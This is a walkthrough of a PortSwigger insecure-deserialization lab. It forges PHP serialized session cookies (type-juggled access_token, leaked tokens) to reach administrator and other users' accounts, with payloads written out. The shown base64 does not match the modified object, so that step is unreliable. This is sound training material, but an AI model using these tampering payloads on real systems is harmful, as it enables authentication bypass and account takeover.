Lab: Modifying serialized data types | Portswigger
Hello folks.
This lab is talking about the insecure deserialization, and while I was solving this lab, I discovered that it has a slightly different solution from the well-known and written solution in the lab, so I decided to write about the two methods so that someone might benefit from any information.
Lab description
This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.
You can log in to your own account using the following credentials: wiener:peter
Access the lab
- Login with your credentials [ wiener : peter ]
- In Burp, open the post-login
GET /my-accountrequest and examine the session cookie using the Inspector to reveal a serialized PHP object. Send this request to Burp Repeater. - Decode it as URL then as base64
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh";}- In Burp Repeater, use the Inspector panel to modify the session cookie as follows:
- Update the length of the
usernameattribute to13. - Change the username to
administrator. - Change the access token to the integer
0. As this is no longer a string, you also need to remove the double-quotes surrounding the value. - Update the data type label for the access token by replacing
swithi.
The result should look like this:
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}
- Encode it as base64 first
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtpOjA7fQ==- Then encode it as url
%54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67%36%49%6e%56%7a%5a%58%4a%75%59%57%31%6c%49%6a%74%7a%4f%6a%59%36%49%6e%64%70%5a%57%35%6c%63%69%49%37%63%7a%6f%78%4d%6a%6f%69%59%57%4e%6a%5a%58%4e%7a%58%33%52%76%61%32%56%75%49%6a%74%70%4f%6a%41%37%66%51%3d%3d- Copy this url encoding format and paste it in Cookie (inspector) and refresh the page
- Wow , i got to access admin panel ans have the permission to delete any user.
Second method
While solving the lab , i made an error in session format it was an internal server error and the server leaked all tokens which stored in the system.
We know that portswigger labs have three main users ( wiener - carlos - administrator )
The leaked tokens :
$access_tokens = [z95mls52t3l8efgp85tfl1aalg54hyg9, gjv08qeybgi7kisid7dsen67zsdj0vbc, f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh]Wiener token was : f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh
So , i have another two tokens and one of them maybe related to administrator
- I tried this token : z95mls52t3l8efgp85tfl1aalg54hyg9
- Then i changed the token value as the following format
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"z95mls52t3l8efgp85tfl1aalg54hyg9";}but it still an internal server error , so the token not related to the administrator user
- I changed token to the last one : gjv08qeybgi7kisid7dsen67zsdj0vbc
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"gjv08qeybgi7kisid7dsen67zsdj0vbc";}It succeeded , now i can access the administrator panel and delete users.
So , i solved the lab.
After browsing admin panel i thought for seconds and tried the last token to access carlos account (account takeover) why not ?
- So, i changed the length of username character from 13 to 6
- I changed the value of username from administrator to carlos as the following format
- I changed the token with the last one.
O:4:"User":2:{s:8:"username";s:6:"carlos";s:12:"access_token";s:32:"z95mls52t3l8efgp85tfl1aalg54hyg9";}So , i encoded it as base64 then as url and paste it in cookie
So , i can access carlos account.
In the end, I tried to solve the laptop in all possible ways, and I hope that you have benefited, even with a small information.
